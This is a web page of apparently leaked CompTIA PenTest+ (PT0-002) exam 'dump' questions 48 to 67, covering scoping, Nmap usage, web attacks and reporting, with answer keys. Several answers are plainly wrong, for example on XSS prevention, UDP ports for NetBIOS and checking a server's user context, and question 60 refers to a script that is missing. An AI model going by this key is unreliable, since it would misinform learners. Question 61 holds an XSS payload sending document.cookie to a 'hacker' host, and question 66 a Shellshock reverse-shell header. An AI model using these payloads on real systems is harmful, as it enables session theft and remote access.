[Dec 08, 2021] PT0-002 Exam Brain Dumps - Study Notes and Theory [Q48-Q67]

[Dec 08, 2021] PT0-002 Exam Brain Dumps - Study Notes and Theory

Pass CompTIA PT0-002 Test Practice Test Questions Exam Dumps

NEW QUESTION 48
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

• A. To validate the billing information with the client
• B. As proof in case they are discovered
• C. As backup in case the original documents are lost
• D. To guide them through the building entrances

Answer: B

 

NEW QUESTION 49
A security engineer identified a new server on the network and wants to scan the host to determine if it is running an approved version of Linux and a patched version of Apache. Which of the following commands will accomplish this task?

• A. nmap -f -sV -p80 192.168.1.20
• B. nmap -O -v -p80 192.168.1.20
• C. nmap -A -T4 -p80 192.168.1.20
• D. nmap -sS -sL -p80 192.168.1.20

Answer: C

 

NEW QUESTION 50
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

• A. Performing spear phishing against employees by posing as senior management
• B. Attempting to tailgate an employee going into the client's workplace
• C. Using a brute-force attack against the external perimeter to gain a foothold
• D. Dropping a malicious USB key with the company's logo in the parking lot

Answer: C

 

NEW QUESTION 51
Which of the following BEST describe the OWASP Top 10? (Choose two.)

• A. The most critical risks of web applications
• B. A risk-governance and compliance framework
• C. The risks defined in order of importance
• D. A list of all the risks of web applications
• E. A checklist of Apache vulnerabilities
• F. A web-application security standard

Answer: A,C

 

NEW QUESTION 52
Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

• A. NDA
• B. SOW
• C. MSA
• D. MOU

Answer: B

 

NEW QUESTION 53
A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract. Which of the following concerns would BEST support the software company's request?

• A. The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.
• B. The reverse-engineering team will be given access to source code for analysis.
• C. The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.
• D. The reverse-engineering team may have a history of selling exploits to third parties.

Answer: B

 

NEW QUESTION 54
A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

• A. Data flooding
• B. Session riding
• C. Cybersquatting
• D. Side channel

Answer: B

 

NEW QUESTION 55
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

• A. Quarterly
• B. Weekly
• C. Annually
• D. Monthly

Answer: B

 

NEW QUESTION 56
A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client's IP address. The tester later discovered the SOC had used sinkholing on the penetration tester's IP address. Which of the following BEST describes what happened?

• A. The planning process failed to ensure all teams were notified
• B. The penetration tester had incorrect contact information
• C. The penetration tester was testing the wrong assets
• D. The client was not ready for the assessment to start

Answer: A

 

NEW QUESTION 57
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

• A. The CVSS score of the finding
• B. The name of the person who found the flaw
• C. The vulnerability identifier
• D. The network location of the vulnerable device
• E. The tool used to find the issue
• F. The client acceptance form

Answer: C,E

 

NEW QUESTION 58
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?

• A. OWASP Web Security Testing Guide
• B. NIST SP 800-115
• C. OSSTMM
• D. PTES technical guidelines

Answer: D

 

NEW QUESTION 59
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?

• A. Document the unprotected file repository as a finding in the penetration-testing report.
• B. Recommend using a password manage/vault instead of text files to store passwords securely.
• C. Create a custom password dictionary as preparation for password spray testing.
• D. Recommend configuring password complexity rules in all the systems and applications.

Answer: A

 

NEW QUESTION 60
A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

• A. Determine active hosts on the network.
• B. Set the TTL of ping packets for stealth.
• C. Scan the system on the most used ports.
• D. Fill the ARP table of the networked devices.

Answer: A

 

NEW QUESTION 61
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

• A. Parameterized queries
• B. Output encoding
• C. Base64 encoding
• D. Web-application firewall
• E. Input validation
• F. Session tokens

Answer: A,F

 

NEW QUESTION 62
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

• A. Perform fuzz testing of compiled binaries.
• B. Add a dependency checker into the tool chain.
• C. Validate API security settings before deployment.
• D. Perform routine static and dynamic analysis of committed code.

Answer: A

 

NEW QUESTION 63
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

• A. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
• B. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
• C. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
• D. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

Answer: C

 

NEW QUESTION 64
An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

• A. OpenVAS
• B. OWASP ZAP
• C. Drozer
• D. Burp Suite

Answer: A

 

NEW QUESTION 65
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

• A. The expected time frame of the assessment
• B. A signed statement of work
• C. The correct user accounts and associated passwords
• D. The proper emergency contacts for the client

Answer: A

 

NEW QUESTION 66
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

• A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
• B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
• C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
• D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: B

 

NEW QUESTION 67
......

Verified PT0-002 dumps Q&As - PT0-002 dumps with Correct Answers: https://www.prepawaypdf.com/CompTIA/PT0-002-practice-exam-dumps.html

The Best CompTIA PenTest+ Study Guide for the PT0-002 Exam: https://drive.google.com/open?id=1Lbqc6gpEzOWFlBMZ6csyCP95mTd3F3AR